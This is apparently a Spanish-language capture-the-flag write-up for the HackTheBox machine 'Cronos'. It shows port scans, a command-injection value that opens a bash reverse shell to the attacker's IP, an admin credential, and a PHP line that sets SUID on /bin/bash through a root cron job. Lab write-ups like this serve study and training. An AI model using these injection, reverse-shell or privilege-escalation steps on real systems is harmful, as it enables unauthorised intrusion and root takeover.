Cronos
| Sistema operativo | Dificultad | Fecha de Lanzamiento | Creador |
|---|---|---|---|
| Linux | Medium | 22 Marzo 2017 | ch4p |
Escaneo de puertos
nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.10.13
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-07 22:00 -03
Initiating SYN Stealth Scan at 22:00
Scanning 10.10.10.13 [65535 ports]
Discovered open port 80/tcp on 10.10.10.13
Discovered open port 53/tcp on 10.10.10.13
Discovered open port 22/tcp on 10.10.10.13
Completed SYN Stealth Scan at 22:00, 17.07s elapsed (65535 total ports)
Nmap scan report for 10.10.10.13
Host is up, received user-set (0.17s latency).
Scanned at 2025-04-07 22:00:04 -03 for 17s
Not shown: 63385 closed tcp ports (reset), 2147 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
53/tcp open domain syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 17.17 seconds
Raw packets sent: 83224 (3.662MB) | Rcvd: 65061 (2.602MB)
Enumeración de versión y servicio
nmap -sCV -p22,53,80 -oN servicesScan 10.10.10.13
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-07 22:00 -03
Nmap scan report for 10.10.10.13 (10.10.10.13)
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.94 seconds
Explotación inicial
root@kali:/home/d4redevil/htb/Cronos/nmap# whatweb 10.10.10.13
http://10.10.10.13 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.10.13], Title[Apache2 Ubuntu Default Page: It works]
echo "10.10.10.13 cronos.htb" >> /etc/hosts
echo "10.10.10.13 admin.cronos.htb" >> /etc/hosts
Reverse Shell
10.10.14.5;bash -c "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"
admin:kEjdbRigfBHUREiNSDs
Escalación de privilegios root/SYSTEM
Tenemos capacidad de escribritura en el binario artisan del cual somos el dueño. Este binario esta siendo ejecutado en una tarea cron cada minuto por el usuario root.
Para escalar privilegios, simplente agregamos al código de artisan un pequeño script en php el cual asigna permisos SUID a la bash.
<?php
system('chmod u+s /bin/bash');
